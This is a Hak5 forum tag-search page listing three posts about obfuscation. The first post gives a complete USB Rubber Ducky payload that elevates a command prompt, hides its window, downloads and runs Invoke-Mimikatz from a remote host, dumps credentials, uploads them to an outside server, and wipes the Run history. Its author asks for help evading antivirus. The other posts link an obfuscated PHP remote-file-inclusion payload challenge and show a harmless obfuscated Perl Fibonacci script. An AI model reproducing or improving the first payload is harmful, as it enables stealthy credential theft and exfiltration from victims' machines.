Jump to content

Search the Community

Showing results for tags 'obfuscation'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 3 results

  1. Hi, I'm trying to avoid antivirus detection of the Invoke-Mimikatz script mentioned here https://www.hak5.org/blog/15-second-password-hack-mr-robot-style I think the only safe way is Base64-encoding the Invoke-Mimikatz script and then decoding it modifying this string in the Powershell script on Rubber Ducky: STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)" I've found some useful links (https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/ and https://blog.den1al.com/2015/02/encoded-mimikatz-powershell-invoker/ but my coding skills are very limited and I'm searching some help to successfully modify the scripts to work with Rubber Ducky. This is my faulty payload: REM Title: Invoke mimikatz and send creds to remote server REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://htmlguru.tk/im.ps1'))); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://htmlguru.tk/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER Thank you in advance for help!
  2. So I see a lot of obfuscated/encoded PHP payloads used in RFI attacks. In general though, they are trivial to decode(Decoding tool I develop https://firebwall.com/decoding/index.php). After writing 2 papers on how and why they could be developed better(http://firebwall.com/research/InsecurityofPoorlyDesignedRemoteFileInclusionPayloads-P1.pdf http://firebwall.com/research/InsecurityofPoorlyDesignedRemoteFileInclusionPayloads-Part2.pdf (written with DigiP)), and only seeing simple increases in the attempt to hide information, I decided to spend an hour and write one that actually was not only hard to decode, but hard to take control over. I put this challenge to the Hak5 community, tell me the password I'm using and how to run commands. I'm certain the Transferable State Attack would help you in your decryption process. Here is the payload: http://pastebin.com/W92Q0Q9j Happy Hacking :D
  3. how's my obfuscation? my($a, $b, $c);($a,$b,$c) = floor();local $d= "\x53\x54\x44\x4f\x55\x54";my @z=('0','5','6','4',rand(10),'0','','3','8','4'); for($i=$z[int(4+(.714287*7))];$i<25;$i++){$c= $a+$b ;$a=$b;$b=$c;syswrite $d,"$c\x0A";} sub floor{return ("\x30"+ ( "\x31")*(((1-1)+1)/(1*1)) -(int(48*0.020833333))), $b=(int((20+1)*("0.0434782" ) )),$c = "\x".(4 +("\x2D". 1)).(0),,,,,,,,,,,,,}; this perl script simply prints the fibonachi sequence. alright perl writers how did i do? post you own obfuscated Fibonachi sequence. interested in what techniques i have not thought of. an tips? purely accedmic.
×
×
  • Create New...